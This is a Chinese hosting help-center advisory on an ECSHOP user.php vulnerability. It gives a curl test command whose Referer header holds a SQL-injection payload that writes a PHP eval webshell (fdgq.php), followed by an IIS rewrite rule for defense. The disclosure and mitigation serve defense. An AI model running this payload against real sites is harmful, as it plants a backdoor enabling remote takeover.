华夏名网帮助中心ECSHOP 的user.php文件存在文件上传漏洞
测试:域名改为自己的哟!
curl -sI "http://www.xxxxxx.com/user.php?act=login" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) huaxiaspider/1.0 (https://www.xxxx.cn/spider.html)" --referer "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:288:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}"
此时网站根目录下会出现一个fdgq.php文件
如果您使用的是IIS作为网站的web引擎,安装了URL重写模块之后,可以添加规则进行防御
<rule name="No Referer" stopProcessing="true">
<match url="user\.php" />
<conditions>
<add input="{HTTP_REFERER}" pattern="^$" negate="true" />
<add input="{HTTP_REFERER}" pattern="^http(s)?://[0-9a-z-\.]+/.*$" negate="true" />
</conditions>
<action type="CustomResponse" statusCode="404" subStatusCode="666" statusReason="may not" statusDescription="111001001011110110100000 111001101001100010101111 111001111000010110011110 111001111010110010010100" />
</rule>
